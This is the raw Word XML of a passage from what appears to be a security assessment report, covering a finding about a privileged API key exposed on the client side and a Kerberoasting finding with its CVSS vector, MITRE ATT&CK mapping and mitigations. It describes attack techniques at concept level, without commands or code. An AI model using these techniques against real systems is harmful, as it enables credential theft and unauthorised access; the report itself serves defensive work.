          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>code,</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78E32F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>allowing</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 xml:space="preserve"> users to view </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="60540FB9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and use i</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="60540FB9">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Attackers can </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 xml:space="preserve"> the API key to execute privileged read and write access on the backend server to view confidential server </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nforma</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CEDC79E">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58118E57">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68D3E05F" w14:textId="2970650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391A402" w:rsidP="0D325B6E" w:rsidRDefault="1391A402" w14:paraId="53DB691E" w14:textId="06466BBC">
      <w:pPr>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391A40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CD33249" w:rsidP="0D325B6E" w:rsidRDefault="1CD33249" w14:paraId="4CD3A9D2" w14:textId="732AC320">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CD33249">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rivileged API key</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="05ED4963">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s being</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 xml:space="preserve"> available to the client </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="37751E6C">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33E6043">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to perform privileged reads and writes </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="433E6043">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="559A0C90">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the server</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 xml:space="preserve">which can result in the leakage of PII or a compromise </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="77F05836">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">of </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3D1CB3D6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>the integrity of the system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="3EF1479F" w14:textId="2024FEC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391A402" w:rsidP="0D325B6E" w:rsidRDefault="1391A402" w14:paraId="2A109487" w14:textId="7894869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91A40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72ADF853" w:rsidP="0D325B6E" w:rsidRDefault="72ADF853" w14:paraId="13F77971" w14:textId="78FCFCF3">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2ADF853">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Depends on application</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="78D7F840" w14:textId="55AD71E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391A402" w:rsidP="0D325B6E" w:rsidRDefault="1391A402" w14:paraId="3617A13B" w14:textId="1591543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91A40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391A402" w:rsidP="0D325B6E" w:rsidRDefault="1391A402" w14:paraId="111C97F6" w14:textId="0D69F23F">
      <w:p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391A40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391A40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450CDA1" w:rsidP="0D325B6E" w:rsidRDefault="1450CDA1" w14:paraId="3A1AB634" w14:textId="288FCF67">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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450CDA1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Immediately reduce the permission level of the exposed API </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7433DEF0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>key and</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="596D38D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96D38D0">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1450CDA1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>egenerate the affected API key as a precaution</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6D44DB7B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2C3A10E5" w:rsidP="0D325B6E" w:rsidRDefault="2C3A10E5" w14:paraId="2BD6A8FD" w14:textId="22B24460">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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C3A10E5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Any privileged leverage API calls should not display the key on the client side.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="439E3DC3" w14:textId="268F9826">
      <w:pPr>
        <w:pStyle w:val="Normal"/>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1391A402" w:rsidP="0D325B6E" w:rsidRDefault="1391A402" w14:paraId="2BD1ED0B" w14:textId="5E39233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391A402">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543DD22" w:rsidP="0D325B6E" w:rsidRDefault="6543DD22" w14:paraId="4B37AB4A" w14:textId="7EEA59E4">
      <w:pPr>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="Rc22971dfbb9c4c7b">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="6543DD22">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>OpenAI - API Private Key Best Practices</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6543DD22">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="3BAB6441" w14:textId="29DB2DCB">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="09CBA97A" w:rsidP="0D325B6E" w:rsidRDefault="09CBA97A" w14:paraId="29359D47" w14:textId="63DA2919">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735665281" w:id="1361456609"/>
      <w:bookmarkStart w:name="_Toc1276319774" w:id="593396772"/>
      <w:bookmarkStart w:name="_Toc565551601" w:id="660512389"/>
      <w:bookmarkStart w:name="_Toc1841544941" w:id="460273171"/>
      <w:bookmarkStart w:name="_Toc684797012" w:id="361866426"/>
      <w:bookmarkStart w:name="_Toc1108454933" w:id="1430817633"/>
      <w:bookmarkStart w:name="_Toc1693759393" w:id="1640893977"/>
      <w:bookmarkStart w:name="_Toc1753494208" w:id="876082451"/>
      <w:bookmarkStart w:name="_Toc265714247" w:id="120315852"/>
      <w:r w:rsidR="09CBA97A">
        <w:rPr/>
        <w:t>Medium:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1361456609"/>
      <w:bookmarkEnd w:id="593396772"/>
      <w:bookmarkEnd w:id="660512389"/>
      <w:bookmarkEnd w:id="460273171"/>
      <w:bookmarkEnd w:id="361866426"/>
      <w:bookmarkEnd w:id="1430817633"/>
      <w:bookmarkEnd w:id="1640893977"/>
      <w:bookmarkEnd w:id="876082451"/>
      <w:bookmarkEnd w:id="120315852"/>
    </w:p>
    <w:p w:rsidR="0B238FCD" w:rsidP="0D325B6E" w:rsidRDefault="0B238FCD" w14:paraId="559FDF39" w14:textId="70928B4F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="0"/>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568649350" w:id="1894291529"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0B238FCD">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="FFC000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0B238FCD">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0B238FCD">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1:</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc1352421964" w:id="575680468"/>
      <w:bookmarkStart w:name="_Toc1419276756" w:id="155821457"/>
      <w:bookmarkStart w:name="_Toc1018028120" w:id="969647264"/>
      <w:bookmarkStart w:name="_Toc186406429" w:id="661659547"/>
      <w:bookmarkStart w:name="_Toc1322042405" w:id="1400445523"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0C922FB9">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0C922FB9">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>K</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0C922FB9">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0C922FB9">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rberoastin</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0C922FB9">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:bookmarkEnd w:id="575680468"/>
      <w:bookmarkEnd w:id="155821457"/>
      <w:bookmarkEnd w:id="969647264"/>
      <w:bookmarkEnd w:id="661659547"/>
      <w:bookmarkEnd w:id="1400445523"/>
      <w:bookmarkEnd w:id="1894291529"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5844055D">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">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49EAB6F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6BBF44" w14:textId="73A8976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8CEEF3" w14:textId="4256690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FB82A9" w14:textId="7887D16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BA2B48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DCFA058" w14:textId="309DE8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77BC24B" w14:textId="57B1D410">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DFC3C78" w14:textId="6A757DE2">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D164862" w14:textId="0A07C455">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1D1850F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6C072C" w14:textId="14006D8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2EF15C6" w14:textId="48D0D205">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1DAB7EA"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4335" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:sz="0"/>
              <w:left w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:right w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="75960CD5"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="2417001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088F99D" w14:textId="71DAAC1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8787A06" w14:textId="5236768B">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:u w:val="none"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" r:id="R6cd3aa531fe74922">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>AV:N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AC:L</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AT:N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PR:N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UI:N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VC:L</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VI:N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VA:N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SC:N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SI:N</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SA:N</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="79269483">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416D3B" w14:textId="4F6EF8A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E6595C" w14:textId="44DBA820">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90CB84F" w14:textId="0E662339">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:u w:val="none"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R0a69fc8e84da4a6c">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T1558.003 </w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>- Steal or Forg</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>e Kerbe</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ros Tickets</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>: Kerberoasting</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="7EE9DF4C">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2B377C5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2D05EA" w14:textId="67DFC713">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AC7DA49" w14:textId="39B3F38D">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42383ce61aca41ce">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M1041: Encrypt Sensitive </w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Information</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="1DDD6C43" w14:textId="7E953DDD">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R12c85bee667d4af8">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1027: Password Policies</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="090C203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33CF22D" w14:textId="1FCBEFF2">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289B277" w14:textId="5EBE0BE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5C2EC4E5" w14:textId="10010FD1">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0C922FB9" w:rsidP="0D325B6E" w:rsidRDefault="0C922FB9" w14:paraId="2DF28EC6" w14:textId="62E0A8F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C922FB9" w:rsidP="0D325B6E" w:rsidRDefault="0C922FB9" w14:paraId="12109327" w14:textId="3A5448B3">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with a valid, </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0C922FB9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>low-privilege domain user account</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can request encrypted tickets for </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0C922FB9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>services</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running on servers</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="08D81ADD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Sinc</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8B49C09">
        <w:rPr>
